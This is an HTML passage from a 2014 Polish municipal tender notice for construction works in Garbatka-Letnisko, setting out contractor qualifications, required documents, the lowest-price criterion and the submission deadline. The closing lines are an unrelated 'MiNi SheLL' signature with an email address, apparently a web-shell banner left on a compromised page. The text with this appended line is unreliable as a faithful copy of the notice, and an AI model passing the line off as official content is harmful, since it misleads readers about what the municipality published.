czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie 
o spełnianiu warunków (zał. Nr 2), o którym mowa w  rozdz. IX  pkt 2 lit. a);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeśli wykaże, że: 
c.1. dysponuje co najmniej:
-	jedną osobą posiadającą uprawnienia do kierownika robotami budowlanymi w specjalności drogowej bez ograniczeń  lub odpowiadające 
im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń  
lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń gazowych bez ograniczeń  lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie 
o spełnianiu warunków (zał. Nr 2), o którym mowa w  rozdz. IX  pkt 2 lit. a);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>)dowód wniesienia wadium - zgodnie z opisem w rozdz. XIII siwz. b)wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów, które będą brały udział w realizacji części zamówienia, na zasadach określonych w art. 26 ust. 2b Pzp zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy, ubiegającemu się o zamówienie odpowiedniego zasobu, czyli wskazać jego zakres, rodzaj, czas udzielenia, a także inne istotne okoliczności, w tym wynikające ze specyfikacji tego zasobu. Z treści dokumentu musi jasno wynikać: b.1) jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu, b.2) w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez wykonawcę, przy wykonaniu zamówienia, b.3) jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem, b.4) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia. Wymagana forma dokumentu - oryginał c)jeżeli wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 Pzp polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów dotyczących tego podmiotu w zakresie wymaganym dla wykonawcy tj., o których mowa w Rozdz. IX ust. 3 tiret a), b), c) d)pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, a umocowanie do złożenia oferty nie wynika z dokumentów rejestrowych Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza e)pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie (w tym: konsorcja, spółki cywilne) w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia. Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza 2)Jeżeli w kraju zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów. Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem w sposób opisany w rozdz. XV pkt 1 lit. i, k) siwz Do oferty należy załączyć wypełnione kosztorysy ofertowe. Załączone kosztorysy zostaną wykorzystane przez Zamawiającego w celach pomocniczych i nie będą miały wpływu na ocenę oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. 2. Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach: a) gdy konieczność zmiany, w tym zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); b) konieczności zmiany terminu realizacji w związku z: - brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych lub - działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub - nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazania przez Zamawiającego terenu budowy Wykonawcy lub - wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę lub - opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub - innymi okolicznościami nie powstałymi z winy Wykonawcy lub - koniecznością wykonania zamówień dodatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.garbatkaletnisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Garbatka-Letnisko, ul. Skrzyńskich 1, 26-930 Garbatka-Letnisko pok. nr 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2014 godzina 08:15, miejsce: Urząd Gminy Garbatka-Letnisko, ul. Skrzyńskich 1, 26-930 Garbatka-Letnisko, Sekretariat, pok. nr 15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com